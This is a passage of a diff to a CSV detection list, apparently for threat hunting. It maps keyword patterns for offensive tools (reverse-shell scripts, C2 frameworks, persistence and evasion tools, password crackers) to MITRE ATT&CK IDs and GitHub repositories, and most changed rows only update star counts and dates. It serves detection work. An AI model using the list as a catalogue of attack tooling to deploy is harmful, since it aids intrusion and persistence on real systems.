have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*Pe2Shellcode.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*PEASS-ng-master*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*Pe2Shellcode.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*PEASS-ng-master*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*peCloak*","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","1","97","39","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z" -"*peinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*peinjector.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*peinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*peinjector.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PELoader/PeLoader.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*pem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Pennyw0rth/NetExec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*pem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*Pennyw0rth/NetExec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*-pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PentestBox*","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*PENTESTING-BIBLE*","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12394","2312","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" +"*PENTESTING-BIBLE*","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. 
BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12397","2308","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" "*pentest-machine*","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","4","315","106","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z" "*pentestmonkey*","offensive_tool_keyword","Github Username","github repo name - privileges exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PE-Obfuscator.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" 
@@ -14658,7 +14824,7 @@ "*Perform password spraying for all active users on a domain*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*Performing recursive ShadowSpray attack*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*perl nikto.pl -h*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","0","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"*perl_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*perl_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*perl-reverse-shell.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*PersAutorun.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PersCLRInstall.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
@@ -14669,18 +14835,18 @@ "*persist runkey*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist spe *.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*Persist.cna*","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","1","1","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" -"*Persist\autorun.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\eventviewer.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\powershell.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - 
TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\screensaver.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\startup.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\winlogon.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*PersistBOF.cna*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*Persist\autorun.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\eventviewer.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\powershell.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\screensaver.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\startup.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" 
+"*Persist\winlogon.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*PersistBOF.cna*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*Persistence.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Persistence.exe*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which 
uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" -"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Persistence.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts 
paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
